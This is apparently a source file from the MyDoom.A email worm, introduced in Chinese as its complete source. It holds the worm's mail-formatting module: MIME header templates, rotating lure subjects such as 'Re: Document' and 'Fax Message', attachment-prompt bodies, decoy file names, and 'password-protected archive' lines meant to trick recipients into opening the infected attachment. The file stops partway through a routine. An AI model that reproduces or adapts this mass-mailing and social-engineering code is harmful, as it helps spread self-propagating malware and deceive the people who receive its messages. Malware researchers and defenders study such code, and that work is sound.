smtpmessage.asm

蠕虫mydoom.a版本的完整源代码

; Format e-mail message
; #########################################################################

.data
        szSysDate       db      "ddd',' dd MMM yyyy ",0
        szSysTime       db      "HH:mm:ss ",0
        szTimeFmt       db      "%03i%02i",0

        szTokens        db      " ",0

        MsgHeader       db      'Date: %s',13,10
                        db      'To: "%s" <%s>',13,10
                        db      'From: "%s" <%s>',13,10
                        db      'Subject: %s',13,10
                        db      'Message-ID: <%s%s>',13,10
                        db      'MIME-Version: 1.0',13,10
                        ;db	'X-Priority: 1 (Highest)',13,10
                        db      'Content-Type: multipart/mixed;',13,10
                        db      '        boundary="--------%s"',13,10,13,10,0

        TxtHeader       db      '----------%s',13,10
                        db      'Content-Type: text/html; charset="us-ascii"',13,10
                        db      "Content-Transfer-Encoding: 7bit",13,10,13,10,0

        ImgPassHeader   db      '----------%s',13,10
                        db      'Content-Type: %s; name="%s.%s"',13,10
                        db      "Content-Transfer-Encoding: base64",13,10
                        db      'Content-Disposition: attachment; filename="%s.%s"',13,10
                        db      'Content-ID: <%s.%s>',13,10,13,10,0

        ZipHeader       db      '----------%s',13,10
                        db      'Content-Type: application/octet-stream; name="%s%s"',13,10
                        db      "Content-Transfer-Encoding: base64",13,10
                        db      'Content-Disposition: attachment; filename="%s%s"',13,10,13,10,0


        ZipBoundaryHdr  db      13,10,13,10,"----------%s--",13,10,13,10,".",13,10,0
        szEmailEnd      db      ".",13,10,0
        szCRLF          db      "<br>",13,10,0
        szTextCRLF      db      13,10,0

        IFDEF TESTVERSION
                szTestSaveFmt   db      "C:\EmailsOut\%s.msg",0
        ENDIF

        szHTMLStart     db      '<html><body>',13,10,0
        szHTMLEnd       db      '</body></html>',13,10,13,10,0

        szPassImg       db      '<img src="cid:%s.%s"><br>',13,10,0
        szPassOnlyFmt   db      "Password: %s",0
                        db      "Pass - %s",0
                        db      "Password - %s",0,0
        dwPassOnlyFmt   dd      0

        szSubjs2        db      "Re: Msg reply",0
                        db      "Re: Hello",0
                        db      "Re: Yahoo!",0
                        db      "Re: Thank you!",0
                        db      "Re: Thanks :)",0
                        db      "RE: Text message",0
                        db      "Re: Document",0
                        db      "Incoming message",0
                        db      "Re: Incoming Message",0
                        db      "RE: Incoming Msg",0
                        db      "RE: Message Notify",0
                        db      "Notification",0
                        db      "Changes..",0
                        db      "Update",0
                        db      "Fax Message",0
                        db      "Protected message",0
                        db      "RE: Protected message",0
                        db      "Forum notify",0
                        db      "Site changes",0
                        db      "Re: Hi",0
                        db      "Encrypted document",0,0
        dwSubjsCount2   dd      0

        szMsgs2         db      "Read the attach.<br><br>",13,10,13,10,0
                        db      "Your file is attached.<br><br>",13,10,13,10,0
                        db      "More info is in attach<br><br>",13,10,13,10,0
                        db      "See attach.<br><br>",13,10,13,10,0
                        db      "Please, have a look at the attached file.<br>",13,10,13,10,0
                        db      "Your document is attached.<br><br>",13,10,13,10,0
                        db      "Please, read the document.<br><br>",13,10,13,10,0
                        db      "Attach tells everything.<br><br>",13,10,13,10,0
                        db      "Attached file tells everything.<br><br>",13,10,13,10,0
                        db      "Check attached file for details.<br><br>",13,10,13,10,0
                        db      "Check attached file.<br><br>",13,10,13,10,0
                        db      "Pay attention at the attach.<br><br>",13,10,13,10,0
                        db      "See the attached file for details.<br><br>",13,10,13,10,0
                        db      "Message is in attach<br><br>",13,10,13,10,0
                        db      "Here is the file.<br><br>",13,10,13,10,0,0
        dwMsgsCount2    dd      0

        szExts          db      ".ini",0
                        db      ".cfg",0
                        db      ".txt",0
                        db      ".vxd",0
                        db      ".def",0
                        db      ".dll",0,0
        dwExtsCount     dd      0
                 
        szPasses        db      13,10,'<br>For security reasons attached file is password protected. The password is <img src="cid:%s.%s"><br>',13,10,0
                        db      13,10,'<br>For security purposes the attached file is password protected. Password -- <img src="cid:%s.%s"><br>',13,10,0
                        db      13,10,'<br>Note: Use password <img src="cid:%s.%s"> to open archive.<br>',13,10,0
                        db      13,10,'<br>Attached file is protected with the password for security reasons. Password is <img src="cid:%s.%s"><br>',13,10,0
                        db      13,10,'<br>In order to read the attach you have to use the following password: <img src="cid:%s.%s"><br>',13,10,0
                        db      13,10,'<br>Archive password: <img src="cid:%s.%s"><br>',13,10,0
                        db      13,10,'<br>Password - <img src="cid:%s.%s"><br>',13,10,0
                        db      13,10,'<br>Password: <img src="cid:%s.%s"><br>',13,10,0,0
        dwPassesCount   dd      0

        szNames         db      "Information",0
                        db      "Details",0
                        db      "text_document",0
                        db	"Updates",0
                        db      "Readme",0
                        db      "Document",0
                        db      "Info",0
                        db      "Details",0
                        db      "MoreInfo",0
                        db      "Message",0,0
        dwNamesCount    dd      0

        szSrcAttachName	db	"Sources",0
        szSrcAttachExt	db	".zip",0

.code

; Valid email rfc time (GMT based)
GenEmailTime proc lpszStr: DWORD
        LOCAL   lpTimeBuf[31]: BYTE
        LOCAL   SysTime: SYSTEMTIME
        LOCAL   lpTimeZone: TIME_ZONE_INFORMATION

        invoke  GetLocalTime, addr SysTime

        invoke  GetDateFormat, LANG_ENGLISH, 0, addr SysTime, offset szSysDate, addr lpTimeBuf, 30
        invoke  lstrcpy, lpszStr, addr lpTimeBuf

        invoke  GetTimeFormat, LANG_ENGLISH, TIME_FORCE24HOURFORMAT, addr SysTime, offset szSysTime, addr lpTimeBuf, 30

        invoke  lstrcat, lpszStr, addr lpTimeBuf

        invoke  GetTimeZoneInformation, addr lpTimeZone

        mov     eax, lpTimeZone.Bias
        neg     eax
        cdq

        mov     ecx, 60
        idiv    ecx

        test    edx, edx
        jge     @F
        neg     edx
@@:

        invoke  wsprintf, addr lpTimeBuf, offset szTimeFmt, eax, edx
        .IF     lpTimeBuf[0] == '0'
                mov     lpTimeBuf[0], '+'
        .ENDIF

        invoke  lstrcat, lpszStr, addr lpTimeBuf

        ret
GenEmailTime endp

; Format email RFC headers
EmailFormatHeader proc To1, To2, From1, From2, Boundary, Subject, szOut: DWORD
        LOCAL   lpRandTemp[30]: BYTE
        LOCAL   lpDate[50]: BYTE

        invoke  ZeroMemory, addr lpRandTemp, 30
        invoke  GetRandomID, addr lpRandTemp, 19
        invoke  GenEmailTime, addr lpDate

        invoke  StrRChr, To2, NULL, '@'
        .IF     eax
                xchg    eax, edx
                invoke  wsprintf, szOut, offset MsgHeader, addr lpDate, To1, To2, From1, From2, Subject, addr lpRandTemp, edx, Boundary
        .ENDIF
        ret
EmailFormatHeader endp

; Choose random string in array
EmailRandomCommon proc uses edi ebx szStrs, lpdwCount: DWORD
        LOCAL   cnt: DWORD

        mov     ebx, lpdwCount

        .IF     !dword ptr[ebx]
                cld
                xor     eax, eax
                mov     edi, szStrs
@next:
                or      ecx, -1
                repnz scasb
                inc     dword ptr[ebx]
                cmp     byte ptr[edi], 0
                jnz     @next
        .ENDIF

        mov     cnt, 0
        invoke  Rand, dword ptr[ebx]
        mov     cnt, eax

        mov     edi, szStrs
        xor     eax, eax
@next2:
        .IF     cnt == 0
                mov     eax, edi
                ret
        .ELSE
                or      ecx, -1
                cld
                repnz scasb
                dec     cnt
                jmp     @next2
        .ENDIF

        ret
EmailRandomCommon endp

; Choose random subject
EmailRandomSubject2 proc
        invoke  EmailRandomCommon, offset szSubjs2, addr dwSubjsCount2
        ret
EmailRandomSubject2 endp

; Choose random message body
EmailRandomMsg2 proc
        invoke  EmailRandomCommon, offset szMsgs2, addr dwMsgsCount2
        ret
EmailRandomMsg2 endp

; Choose random name
EmailRandomName proc
        invoke  EmailRandomCommon, offset szNames, addr dwNamesCount
        ret
EmailRandomName endp

; Choose password fmt
EmailRandomPass proc
        invoke  EmailRandomCommon, offset szPasses, addr dwPassesCount
        ret
EmailRandomPass endp

; Choose random password text
EmailRandomPassOnlyFmt proc
        invoke  EmailRandomCommon, offset szPassOnlyFmt, addr dwPassOnlyFmt
        ret
EmailRandomPassOnlyFmt endp

; Choose random extension